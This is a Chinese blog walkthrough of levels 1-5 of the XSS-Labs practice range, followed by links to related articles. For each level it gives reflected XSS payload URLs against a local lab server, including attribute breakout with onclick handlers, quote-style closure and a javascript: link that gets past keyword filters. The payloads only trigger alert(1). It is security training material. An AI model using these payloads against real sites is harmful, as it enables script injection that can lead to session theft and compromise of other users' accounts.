[靶场] XSS-Labs 01-05

最新推荐文章于 2024-10-03 03:10:54 发布
最新推荐文章于 2024-10-03 03:10:54 发布
阅读量125 收藏 4
点赞数 1
分类专栏: # 靶场 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40929683/article/details/120378140
版权

1. Level1-注入脚本

提交正常数据,字符串xss,判断请求方式为GET请求,字符回显在h2标签内。

我们测试直接插入脚本<script>标签。

http://127.0.0.1:8005/level1.php?name=<script>alert(1);</script>

 代码成功注入HTML页面中。

代码:

2. Level2-注入事件(双引号闭合)

提交正常数据,依然时GET请求方式,数据回显在input的value属性中。

我们可以尝试引入事件,或者闭合标签引入脚本

引入事件:

http://127.0.0.1:8005/level2.php?keyword=" onclick="alert(1)

 成功触发XSS。

闭合标签,引入脚本:

http://127.0.0.1:8005/level2.php?keyword="><script>alert(1);</script>

XSS成触发。

代码:

3. Level3-注入事件(单引号闭合)

正常提交数据,请求方式为GET,数据回显在intpu的value中。

我们使用引入事件的方法:

但无法闭合属性值的引号。

我们右击查看源代码。发现是单引号闭合,我们使用单引号闭合。

http://127.0.0.1:8005/level3.php?keyword=' onclick='alert(1)

成功闭合,触发XSS。

代码:

4. Level4-空格绕过

请求方式为GET,数据回显在input的value属性中。

我们闭合标签,引入脚本。

http://127.0.0.1:8005/level4.php?keyword="> <script>alert(1);</script>

脚本的<>被过滤,替换为空。 

我们尝试闭合双引号("),双引号和字符加空格。

http://127.0.0.1:8005/level4.php?keyword=" xss

发现xss被作为属性名了,我们可以引入时间触发XSS。

http://127.0.0.1:8005/level4.php?keyword=" onclick="alert(1)

 成功引入事件,并触发XSS。

代码:

过滤<>为空。

5. Level5-javascript伪协议绕过

提交访问为GET,数据回显在intput标签的value中。 

我们闭合标签,插入脚本:

http://127.0.0.1:8005/level5.php?keyword="><script>alert(1);</script>

其中的script被替换为scr_ipt。

我们尝试引入事件。

http://127.0.0.1:8005/level5.php?keyword=" onclick="alert(1)

但是on被过滤为o_n。

我们使用javascript伪协议绕过。

http://127.0.0.1:8005/level5.php?keyword=">  <a href=javascript:alert(1)>

点击a标签,XSS成功触发。 

代码:

过滤<script、on为空。

3hex___________
关注
专栏目录
xss-labs-master.zip(xss注入通关游戏/靶场
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
XSSxss-labs-level3
Hugu
02-23 996
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该网页或请求该网页中的内容之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS
xss-labs靶场1-5关
zyh1588的博客
11-21 413
小白回顾xss靶场1-5关
xss-labs靶场全关通关
m0_64849639的博客
09-04 972
alert('111')</script><script>
xss-labs靶场通关详解
shw_yzh的博客
08-23 757
xss-labs靶场通关详解
【网络安全 --- xss-labs靶场xss-labs靶场安装详细教程,让你巩固对xss漏洞的理解及绕过技巧和方法(提供资源)
m0_67844671的博客
10-18 1605
【网络安全 --- xss-labs通关】xss-labs靶场通关,让你巩固对xss漏洞的理解及绕过技巧和方法(提供资源)
XSS靶场闯关(xss-labs)
小郑的博客
04-22 2080
对数据进行了是否含有http://做了判断,并对关键字做了替换,把数据加到了a标签的href属性中,在属性中的数据可以考虑编码,并利用js的注释符//注释掉http://当前页面上有两个输出地方,一个输出到了h2标签,后台进行了实体编码,另一个输出到input标签的value属性,没有进行html实体编码,考虑闭合input标签。对on,script进行了替换,将数据加到了input标签的value属性中,没有进行实体编码处理,可以考虑a标签的href属性,可以直接写伪协议。
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-21 5603
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
Web渗透-XSS漏洞深入及xss-labs靶场实战
Varin
06-24 1718
xss全称(cross site scripting)跨站脚本攻击,是最常见的web应用程序安全漏洞之一,位于owasptop102013年度第三名xss是指攻击者在网页中嵌入客户端脚本,通常是javascrip编写的危险代码,当用户使用浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的
XSS-labs靶场通关
weixin_70292186的博客
05-08 1059
首先说一下embed标签,可以理解为定义了一个区域,可以把html文档、图片、视频、音频等内容内嵌到当前页面,这关浏览器不支持flash插件,所以图片显示不出来,如果感觉别扭,就在后端把。里面的链接失效了,这关跳过,不过提一句,这关涉及到了exif漏洞,原理是有些网站有读取图片exif信息的功能,当网站读取到的恶意的exif信息就会触发属性中的。发现有的转义,还在script中间加了下划线_,接着尝试闭合,同样存在闭合和转义,所以利用a标签的href来闭合。的,所以加个type="text"
XSS-labs-master靶场的搭建
weixin_68416970的博客
06-18 402
XSS-labs-master靶场的搭建
XSS-labs靶场练习-持续更新中
09-09
还在为XSS烦恼吗,在这里手把手教你打靶场
Pikachu-Cross-Site Scripting-xss盲打
guanrongl的专栏
10-03 319
xss盲打,不是一种漏洞类型,而是一个攻击场景;在前端、或者在当前页面是看不到攻击结果;而是在后端、在别的页面才看到结果。登陆后台,查看结果;
PIKACHU | PIKACHU 靶场 XSS 后台配置
Blue17 の 小窝
09-30 866
PIKACHU 自带了一个 XSS 平台,可以辅助我们完成 XSS 攻击,但是该后台需要配置数据库以后才能使用。本教程,就是教大家如何配置 PIKACHU XSS 平台的。PIKACHU XSS 平台的配置流程主要分为以下三步:修改 PIKACHU 数据库配置文件。=> 修改过的可以跳过此步初始化 PIKACHU XSS 平台数据库。登录并使用 PIKACHU XSS 平台。
XSS(内含DVWA)
m0_73902453的博客
09-27 886
反射型 XSS:即时反射,依赖用户点击链接,通常是一次性的。存储型 XSS:恶意代码存储在服务器上,多次执行,影响广泛。DOM型 XSS:常在客户端,通过操控 DOM 元素来执行,无需与服务器交互。
Pikachu-xss防范措施 - href输出 & js输出
最新发布
guanrongl的专栏
10-03 418
要想防止href 标签的xss : 一、可以做输入限定,只允许http 、https 的头的输入;二、结合输入限定后再做特殊字符转义。转义:所有输出到前端的数据,都根据输出点进行转义,比如输出到html中进行html实体转义,输入到 JS 里面的进行 JS 转义。过滤:根据业务需要进行过滤,如:输入点要求输入手机号,则只允许输入手机号格式的数字;从页面代码上看出,这是个href 标签,并且做了href特殊字符转换。核心点是:$ms == 'tmac'总体原则: 输入做过滤,输出做转义。
Pikachu-Cross-Site Scripting-反射型xss(get)
guanrongl的专栏
10-02 518
存储型XSS是指恶意脚本被存储在目标服务器上,当用户访问包含该脚本的页面时,脚本会被执行。例如,攻击者可以在留言板中输入恶意脚本,当其他用户查看留言时,脚本会在他们的浏览器中执行。这种类型的XSS不需要服务器端的参与,攻击者通过构造特定的URL或操作DOM,使得浏览器执行恶意脚本。提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞;2、输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回的源码,是否有做对应的处理;先输入各种特殊字符,查看源代码,查看页面返回;
XSS基础
2302_81328699的博客
10-01 345
【代码】XSS基础
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值